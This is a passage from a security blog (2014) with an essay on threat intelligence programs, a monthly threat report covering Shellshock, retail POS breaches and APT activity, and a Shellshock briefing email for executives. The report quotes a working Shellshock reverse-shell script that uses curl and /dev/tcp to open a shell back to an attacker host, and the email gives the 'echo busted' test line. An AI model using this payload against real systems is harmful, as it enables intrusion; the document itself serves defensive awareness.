Well there you have it. I have had this running around my mind for a while now and lacked the motivation to post until today. I hope this is helpful to some of you and I am sure there are some people out there who may take issue with some of what I said (mostly vendors I am assuming) but it had to be said. While it all may sound sexy and full of intrigue there is also a lot of snake oil as well. Unless you understand the goals of what you are buying into you just end up wasting your time and money.

Frankly I have seen so many orgs out there who lack even the capacity to have effective security awareness programs so I have little hope that any of them would be able to cobble together a real intelligence function. All too many places just want the check box of “YUP! I HAVE A THREAT INTELLIGENCE FEED! I AM SOOPER COOL” and it saddens me. Ok, no, wait.. It really enrages me most of the time as many of you may already see in my Twitter feed daily. I guess maybe that’s all well and good for them but for me this is just wasting time and money. If you want to protect your org then you should be doing things that make more sense than buying bad intel and a yara feed.

Don’t even get me started on all the vendor’s super cute names for all their actors and how they don’t share intel with each other. That will only make me even more rage filled I am sure. Of late I have been told I need to start a service to teach the intelligence cycle and all of the things that pertain to running a good program. It is something I am considering but there has to be a desire out there. On average I am not seeing too  many orgs outside of the big defense base types who care enough to do it right. Don’t get me wrong though, I don’t think this has to be a big spend either. In fact I think many places could just drop their very expensive threat intelligence feeds and buy an IDS, set up a team, and do all this work more effectively themselves.

*heresy huh?*

Think about it. More later on the pitfalls of intelligence analysis and cognitive bias.

K.

Written by Krypt3ia

2014/10/02 at 20:14

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

leave a comment »

photo

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

EXECUTIVE SUMMARY

During the month of September 2014 there were a number of incidents reported as well as stories of malware and crimeware. However, none of them compares in scope and threat to the bash bug that was released for all UNIX and Linux systems on the internet. The “Shellshock” bash vulnerability was released Wednesday 9/24/2014 and within a short time the internet was abuzz with alerts that all *NIX systems were vulnerable to this.

The bash bug is a real and present danger to systems that may misconfigured as well as those with the proper security features enabled. This is due to the fact that once the bug is exploited the attacker may then use other code to exploit the system further and thus compromise that machine. A further discussion of this bug and its import can be found below.

In other areas the global threat level is at a constant but with this new bash vulnerability and the issues surrounding it’s remediation the THREATCON LEVEL for this month post release of the Shellshock bug is at HIGH.

GLOBAL THREATS

SHELLSHOCK:

Shellshock: at its heart is a bug within the parser of the bash shell. The “bash” shell is the most common “command processor” in the UNIX and Linux systems we have today. The bug comes from the parser not stopping its function at the point where the command has been carried out but continues on and allows for arbitrary code to be run.

CVE-2014-6271: This is the original “Shellshock” Bash bug. When most people refer to the Bash bug or “Shellshock”, they are most likely talking about this CVE.

CVE-2014-7169: This is the CVE assigned to the incomplete patch for the original bug.

The original patch was found to be incomplete shortly after the vulnerability was publicly disclosed. A variation on the original malicious syntax may allow an attacker to perform unauthorized actions including writing to arbitrary files.

CVE-2014-7186 & CVE-2014-7187: These two CVEs are for bugs discovered in relation to the original Bash bug. These two bugs are triggered by syntax that is very similar to the original Bash bug, but instead of command injection, they allow for out of bounds memory access. There is currently no proof that these bugs have remote vectors and they have not been seen in the wild.

CVE-2014-6277 & CVE-2014-6278: Security researchers discovered two additional bugs. These two bugs are supposed to have the potential for arbitrary command injection, similar to the original Bash bug. However details have not been made public yet, in order to allow appropriate patches to be created.

ANALYSIS:

The primary issues around this vulnerability is simply this;

The bug could allow for code to be run on systems connected to the internet by anyone who can access them with and simply run code against them. This means all websites that run CGI/HTTP etc that run on UNIX/LINUX as well as any appliance (routers and other types) that have a web based or shell interface that can be accessed to pass the code to.

What this means is that no matter if you have the system locked down it may be possible, if the interface is available, to run 0day code or common commands that may cause the system to respond in ways that it was not meant to. An example of this that may impress the danger upon you is that with the right code, on a vulnerable system, one can create a reverse connection (AKA s shell session) to from your machine to the attacker with some very simple code.

Example Code:

#!/bin/bash

echo little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva

# step 1.- #nc -lp 8080 -vvv

# step 2.-  #./little-shellshock-reverse.sh localhostIP attackhostIP

/usr/bin/curl -A “() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1″ http ://$2/cgi-bin/test.cgi

Once this code has been run you will have a connection to that machine to further exploit it remotely at your leisure. Additionally due to the nature of the bug and the variability of the code that could be exploited here we are still unsure of just where the boundaries are on attacks using this vulnerability.

Patching the systems with vendor patches is the primary fix to this and to date more patches are being released every day from large and small vendors to fix the parser and to stop the bug. However, you have to be vigilant and seek out all your systems within your environments that may have bash as their shell and insure that they can be patched. In some cases these systems may not have any code to be used to patch because they are out of date and the companies may not even exist any more.

This bug has already been seen used in the wild by APT actors as well as there are now malware versions out there using the bug to seek out and exploit machines automatically. It is recommended that if you have not begun attempts to assess all of your assets both internally and externally that you should do so as soon as possible. This exploit can now be detected by IDS systems signatures but unless they are blocked at the network level by an IPS you may be compromised and not be aware of it already.

Links:

http://www.tchnologyreview.com/view/531286/why-the-shellshock-bug-is-worse-than-heartbleed/

http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/29/the-internet-is-still-shellshocked-by-latest-bug-but-it-wont-be-the-last/

http://www.wired.com/2014/09/shellshocked-bash/

Incidents:

Supervalu Reports Second Hacking Incident:

Supervalu, a grocery chain, has reported a second compromise to it’s payment systems this September. The first was reported on in August and now the second seems to be unrelated to the first incident and group.

These attacks both targeted the POS (Point Of Sale) systems within the stores and the net loss of credit cards according to Supervalu and authorities have yet to be released at this time.

ANALYSIS:

POS systems are notorious for being insecure. The reasons for this stem from not only the fact that the systems often need to be installed on computers with outdated Windows Xp on them but also in that they do not encrypt the data on the fly.

RAM scrapers are simple pieces of malware that sit in the memory of the POS system and just copy the data that is swiped in by the consumer at the terminal. This vulnerability is not new and has been leveraged by the carders who have been carrying out these attacks. These attacks will continue until such time as the POS terminals are secured at the application level and or the more secure “Chip and Pin” systems are implemented in the US as they already have been in the EU.

Links:

http://online.wsj.com/articles/customers-data-may-have-been-hacked-at-albertsons-acme-stores-1412027253

http://www.cbsnews.com/news/new-hack-attack-at-albertsons-supervalu-stores/

http://www.wired.com/2014/09/ram-scrapers-how-they-work/

“The Fappening”: (Celebrity Nudes Hacked from iCloud)

In August the release of nude photographs of famous women caused a sensation on line and in the news media. The photos and videos were all stolen from the Apple iCloud service that all iPhones and iPads use. The FBI has begun an investigation into the hacking incident that caused this and into the attackers who not only hacked into the iCloud but also released the photos online as a breach of privacy.

ANALYSIS:

The “Fappening” as the incident was named on Reddit and other sites within the DarkNet shows just how vulnerable we all are to compromising situations where technology is concerned. It is assumed by us all at some point that the data (i.e. photos and videos) are safe in the cloud storage that we upload to because companies like Apple are doing their due diligence in protecting that content. However, this incident shows that that may not always be the case and that your private and personal intimates may be open to anyone who can brute force a password.

The same analogy can be made for any cloud stored data that a company may be placing for safe keeping. It is important to consider the privacy and security aspects of all data a company or an individual may create and or allow you to hold for them. As such any company doing business holding or letting data be held should take pains to insure the due diligence on privacy and security. The Fappening is a cautionary tale where this all went wrong.

http://www.nytimes.com/2014/09/03/technology/trove-of-nude-photos-sparks-debate-over-online-behavior.html?_r=0

http://www.independent.co.uk/life-style/gadgets-and-tech/news/the-fappening-after-the-third-wave-of-leaked-celebrity-photos-why-cant-we-stop-it-9763528.html

CRIMEWARE AND MALWARE

FBI Opens Malware Investigator Portal to Industry:

The FBI has opened their malware analysis portal online for sharing with private industry. This site will be another in many types of information sharing that the government and private entities will be creating to help in the fight against malware and criminal activities. This portal will have malware samples, data on attacks and signatures to use in determining the attacks and the attacker characteristics.

The portal will also have a feature like malwr.com and cuckoo where you can upload a suspected file to it and allow a session to determine whether or not it is malware and just what it does after it infects a system.

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

ANALYSIS:

The analysis of malware is an important feature in today’s information security program. Reliance only on technologies like AntiVirus is hubris and should be augmented with analysts who can test suspect files and links to insure whether or not they are a threat to the environment.

Often times AV products are on the back end of the curve where malware is concerned today and such tools like Cuckoo and Malwr.com are integral to a functioning IR (Incident Response) program at any company. That the FBI is allowing the use of this also adds value to the FBI in that they are getting live intelligence on potentially unseen malware from their user base.

Home Depot Reportedly Hit by New Malware In Recent Hack:

Home Depot reported in August that they had been hacked and their POS (Point Of Sale) systems were targeted. The hack was ongoing undetected for about 5 months and in that time the carders made away with approximately 56 million credit card numbers and attendant data.

On September 14th though the Unites States Secret Service reported that the malware that was used in this attack was a new variant never seen before. They named the malware “Mozart” However, others are claiming that the malware is in fact the same BlackPOS malware that was used in the Target hack that also stole large amounts of credit cards from their stores last year.

ANALYSIS:

The malware used in the attack on Home Depot is definitely linked to the Lampeduza collective who carried out the attack and sales of the Target data. Within the strings of the code for the mlware there are direct connections to the Lampeduza crew up to and including references to Libya and Ukraine and American meddling in such regions.

This sentiment is echoed in the sites that are affiliated with the Lampeduza group as well as a penchant for Libya and the late Muammar Khaddafi. Another factor here is that the malware fundamentally functioned identically to the BlackPOS malware usedf on Target.

http://online.wsj.com/articles/home-depot-was-hacked-by-previously-unseen-mozart-malware-1411605219

http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/

APT ACTIVITIES

Chinese Target Hong Kong Protesters iPhones with Malware:

Malware has been discovered affecting the protesters in Hong Kong that began protesting this week. This is a very targeted and rapid attack to attempt to control the protesters and perhaps arrest those who may be sympathetic to their cause.

ANALYSIS:

The malware dubbed “Xsser RAT” was installed by China on the protesters phones and is different than most because it not only affects Android phones but also iOS (Apple) phones as well but at this time no wild version that works has been seen. This cross platform malware has the ability, once installed on the phone, to see and capture everything that the user does on the phone.

Code within the malware has shown that it contains Chinese characters and reports back to a command and control that is under Chinese control. This is just another escalation in an ongoing battle over protests concerning a more free Hong Kong, something China does not necessarily want.

This incident serves as a parable on how advanced persistent threats can use weaponized code that they have already in their control to rapidly deploy and use against those they would wish to attack.

http://www.nbcnews.com/storyline/hong-kong-protests/hong-kong-protesters-phones-targeted-chinese-malware-experts-say-n215396

Putting TRANSCOM in Perspective

Today, the Senate Armed Services Committee released information indicating that China-based threat actors were heavily targeting TRANSCOM, the U.S. military’s logistics arm. In terms of the private sector contractors impacted, the intrusions detailed in the Levin report mirror activity FireEye has observed: we frequently see nation state threat actors target not only government, but also private sector organizations in order to obtain military intelligence.

ANALYSIS:

Fireeye put out a blog post after the US DOD put out a report on attacks that were carried out by APT actors against defense base companies. This is not necessarily news but the fact remains that not only the defense base has been a target of late of nation state actors.

While APT (Advanced Persistent Threats) are prevalent it is important to know that they are targeting anything and everything that may be of interest to them. This means now that public systems as well as corporations are now potential targets. As such, it is important that all companies take the time to understand what all of this means, how these actors carry out their attacks, and how one can protect against these attacks.

http://www.fireeye.com/blog/technical/2014/09/putting-transcom-in-perspective.html

I have also created a word format of this document with a section where you can put in your own metrics. Use this document to give your executives a threat intelligence report and hopefully enlighten them on what is going on out there.

LINK TO WORD FORMAT OF THIS DOCUMENT: HERE

Written by Krypt3ia

2014/10/01 at 20:28

Posted in Uncategorized

SHELLSHOCK!

leave a comment »

758f00996e876b8d3dd7db3b3543426d

Hey kids!

I just thought I would drop this stock email for you all to use to splain to your execs the problem of SHELLSHOCK and that it is IMPORTANT! I tried to wordsmith for the exec set in here and the links go right to pertinent blog posts and the CVE from NIST. Just a heads up I just saw that F5 BIG-IP is also in fact vulnerable to this attack so WHEEEEE!

Smoke em if you got em…

K.

UPDATE: Looks like SUID attack may be possible too…

Screenshot from 2014-09-25 08:09:17

Email Text:

All,

There’s a new vulnerability that affects nearly every system out there using BASH shell on the internet. This means that any Linux/UNIX system that is at the moment, internet facing is potentially vulnerable to being exploited by someone using commands inserted and sent to servers via CGI scripting or html for example. There is already a module in metasploit on this but you can check your versioning and if it is vulnerable with the following command in bash shell. This is an important vulnerability that could lead to larger compromise of our environment!

The short answer here about this vuln is that if you are vulnerable an attacker can use random code to have your system spit out data that you don’t want available such as etc password files etc.

Needless to say this is of a HIGH importance and rates a 10 on the NIST scale!

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-6271

https://t.co/RprJoBGl7s

http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html?m=1

How to test for this vulnerability:

env X=”() { :;} ; echo busted” /bin/sh -c “echo stuff”

If you get “busted“ back you are in fact vulnerable.

 

REMEDIATIONS:

https://access.redhat.com/solutions/1207723 Red Hat recommendations

There’s a new vulnerability that affects nearly every system out there using BASH shell on the internet. This means that any Linux/UNIX system that is at the moment, internet facing is potentially vulnerable to being exploited by someone using commands inserted and sent to servers via CGI scripting. There is already a module in metasploit on this but you can check your versioning and if it is vulnerable with the following command in bash shell. ~Troy Hunt

Another concern here is this.. Other appliances that are at risk;

The bigger worry is the devices with no easy patching path, for example your router. Short of checking in with the manufacturer’s website for updated firmware, this is going to be a really hard nut to crack. Often routers provided by ISPs are locked down so that consumers aren’t randomly changing either config or firmware and there’s not always a remote upgrade path they can trigger either. Combine that with the massive array of devices and ages that are out there and this could be particularly tricky. Of course it’s also not the sort of thing your average consumer is going to be comfortable doing themselves either. ~Troy Hunt

Another option is to remove BASH and replace it with something else;

“Other more drastic options include replacing Bash with an alternate shell implementation or cordoning off at-risk systems, both of which could have far-reaching ramifications and are unlikely to be decisions taken lightly. But that’s probably going to be the nature of this bug for many people – hard decisions that could have tangible business impact in order to avoid potentially much more significant ramifications.” ~Troy Hunt

 

DETECTION OF COMPROMISE:

Basically there is no means to do so effectively unless perhaps you are capturing all packets…

This can be hard to determine if there’s no logging of the attack vectors (there often won’t be if it’s passed by HTTP request header or POST body), but it’s more likely to be caught than with Heartbleed when short of full on pcaps, the heartbeat payloads would not normally have been logged anywhere. ~Troy Hunt

The real problem here is that this exploit set is still being worked out because it’s kinda modular. What I mean is that if you can get random code to work then you can place exploit code in there and get 0day to complete the job. So this is an evolving threat and MUST be taken seriously. Mitigation strategies should be worked out in the environment and all due diligence should be followed on keeping up with the intelligence on this vulnerability and what is being seen in the wild.

Written by Krypt3ia

2014/09/25 at 11:14

Follow

Get every new post delivered to your Inbox.

Join 136 other followers